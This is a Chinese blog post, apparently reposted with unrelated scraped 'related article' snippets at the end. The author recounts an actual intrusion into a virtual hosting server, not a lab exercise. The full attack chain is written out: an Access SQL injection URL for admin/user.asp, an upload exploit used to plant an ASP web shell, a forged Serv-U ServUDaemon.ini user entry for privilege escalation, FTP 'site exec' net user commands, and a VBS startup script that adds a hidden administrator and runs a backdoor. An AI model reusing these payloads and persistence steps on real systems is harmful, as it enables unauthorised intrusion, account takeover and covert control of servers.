虚拟机服务器渗透,对一台虚拟主机服务器的渗透 -电脑资料
前几天听一树说了惊云下载系统的漏洞
问题文件出在admin/user.asp
提交
http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1
就相当于:
select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’"
利用access注入得到管理员密码
上面有一个文件upfile.htm
手工利用了下动网的upfile.asp漏洞
就成功上传了个asp木马
然后那个虚拟主机的c,d盘是NTFS分区
不能访问E盘装着servu,php,webmail,
F盘是虚拟站点
servu安装目录可写~
本来打算替换他servu文件的~但是觉的太麻烦
还容易让管理员怀疑
想起servu的本地提升来了
在自己计算机上装了个servu
添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限
然后去servu安装目录里看ServUDaemon.ini
格式是这样的
[GLOBAL]
Version=5.0.0.11
LocalSetupPassword=072C63105200180D5C07170A7E3E
LocalSetupPortNo=60628
ProcessID=972
[DOMAINS]
Domain1=192.168.0.102||21|向导产生域|1|0|0
Domain2=192.168.0.102||2121|123|2|0|0
[Domain1]
User1=www|1|0
[USER=www|1]
Password=ih0C292E1AC82920B7F384007F302A1296
HomeDir=D:\xiaoben
TimeOut=600
Note1="Wizard generated account"
Access1=D:\xiaoben|RLPWAMCD
SKEYValues=
[Domain2]
User1=rover|1|0
User2=123|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
[USER=123|2]
Password=kv3F6EED70340AD1478ADF95963A07FD00
HomeDir=c:\
TimeOut=600
Access1=C:\|RWAMLCDP
SKEYValues=
----------------
其中rover用户就是我添加的那个
在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini
访照我本地的INI写进一个用户进去
User1=rover|1|0
[USER=rover|2]
Password=dx5D12C060F16C7166779414FA038E881D
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
保存~
用我新建的用户和密码连接~
好的,还是连上了
ftp
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录,对一台虚拟主机服务器的渗透》(https://www.unjs.com)。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。
提示没有权限~郁闷~
但是我们有对C盘的访问权限了是不~hoho~
把后门(server.exe)传他system32目录
然后写一个VBs教本
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)
b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)
b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)
b=wshshell.run ("cmd.exe /c server.exe",0)
存为HELP.vbe
这个教本的作用是修改tsinternetuser用户密码为rover1234
并且提升为管理员
然后执行system32目录下的server.exe
把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动
目录
这样管理员只要一登陆就会执行那个教本~
接下来就是等了~
等他登陆~
等了一段时间(看了一部蜘蛛侠的时间吧)~
连接后门~得到admin权限的shell
hoho~
接下来是善后工作了~就不说了
今天心情非常糟~有一些事情压的我喘不过气来
考试的时候当老师面把卷子撕了,然后扬步走了~
妈妈的~过程写的很乱~见谅
虚拟机服务器渗透,对一台虚拟主机服务器的渗透 -电脑资料相关推荐
- 如何一台服务器虚拟多人用,使用服务器如何实现多台虚拟主机
使用服务器如何实现多台虚拟主机 发布时间:2020-10-15 15:10:36 来源:亿速云 阅读:85 作者:Leah 栏目:云计算 今天就跟大家聊聊有关使用服务器如何实现多台虚拟主机,可能很多人 ...
- 虚拟服务器 自己搭建,自己搭建虚拟主机服务器
自己搭建虚拟主机服务器 内容精选 换一换 软件包如下所示:打开"qemu.conf"文件.vim /etc/libvirt/qemu.conf找到修改位置,修改user = &qu ...
- 服务器怎样创建多台虚拟主机,服务器是如何实现多台虚拟主机
服务器是如何实现多台虚拟主机 内容精选 换一换 弹性云服务器(Elastic Cloud Server)是一种可随时自动获取.计算能力可弹性伸缩的云服务器,可帮助您打造可靠.安全.灵活.高效的应用环境 ...
- 虚拟服务器登录,虚拟主机服务器登录
虚拟主机服务器登录 内容精选 换一换 用户可以在管理控制台查看每台专属主机上当前运行的云服务器的信息.登录管理控制台.单击管理控制台左上角的,选择区域和项目.选择"计算 > 专属主机& ...
- 虚拟服务器e,虚拟主机服务器E
虚拟主机服务器E 内容精选 换一换 华为云主机迁移服务帮助中心,为用户提供产品简介.快速入门.用户指南.API参考.最佳实践.常见问题.视频帮助等技术文档,帮助您快速上手使用主机迁移服务. 本文介绍了 ...
- 虚拟主机搭建python服务器,python虚拟主机服务器
python虚拟主机服务器 内容精选 换一换 弹性云服务器(Elastic Cloud Server,以下简称ECS)是由CPU.内存.镜像.云硬盘组成的一种可随时获取.弹性可扩展的计算服务器,同时它 ...
- 虚拟服务器价格,虚拟主机服务器价格表
虚拟主机服务器价格表 内容精选 换一换 包年/包月的计费模式也称为包周期计费模式,是一种预付费方式,按订单的购买周期计费,适用于可预估资源使用周期的场景,价格比按需计费模式更优惠.包年/包月计费模式的 ...
- 虚拟主机的服务器放在哪里,虚拟主机服务器放在哪里
虚拟主机服务器放在哪里 内容精选 换一换 专属主机搭载了华为云虚拟化系统,购买之后可以直接使用ECS的公共镜像发放虚拟机.裸金属服务器属于裸金属架构,上面没有提供虚拟化平台. 裸金属服务器与专属主机均 ...
- 虚拟服务器怎么用命令重启服务,虚拟机服务器重启命令行
虚拟机服务器重启命令行 内容精选 换一换 确认服务器服务是否开启.登录虚拟机内部.执行如下命令,查看系统的端口监听状态,如图1所示.netstat -ntplWindows虚拟机可以在命令行中执行ne ...
- 虚拟主机服务器地址,虚拟主机的服务器地址
虚拟主机的服务器地址 内容精选 换一换 主机管理的云服务器列表中仅显示以下主机的防护状态:在所选区域购买的华为云主机已接入所选区域的非华为云主机在所选区域购买的华为云主机已接入所选区域的非华为云主机若 ...
最新文章
- 群星巨型计算机事件,群星 三种特殊事件介绍 特殊事件有几种
- 脉冲多普勒雷达_是人类还是动物? 多普勒脉冲雷达和神经网络的目标分类
- jsp页面中使用javascript获取后台放在request或session中的值
- 16. 收款(Accepting Money)
- matlab课堂笔记,厦门大学matlab第四次课程笔记 PTB的简单讲解
- Java多线程讲解,超详细!可获取相关笔记
- Linux下7款最佳的开源视频播放器
- 中国IT前线战士:蚂蚁雄兵
- SpringBoot实现Excel导入导出,好用到爆,POI可以扔掉了
- 接口授权时已经有access_token了为啥还需要refresh_token
- “浙大学霸作息表”疯传,网友:越优秀就越努力!
- 如何使用树莓派连接电脑无线网络热点并查看树莓派ip地址
- java将淘宝客链接转换为正常商品链接
- 联想服务器带外管理怎么进系统,管理 Internet Explorer 中的加载项
- 如何在网页中嵌入商务通对话框
- 计算机设备标签怎么贴,电脑怎么打印不干胶标签 电脑打印不干胶标签操作流程【图文】...
- overleaf表格_LaTeX基本命令使用教程(清晰实例)(Overleaf平台)(论文排版)
- Oracle内存过度消耗风险提醒
- java vi命令 退出_Git 使用vi或vim命令打开、关闭、保存文件
- python可以干什么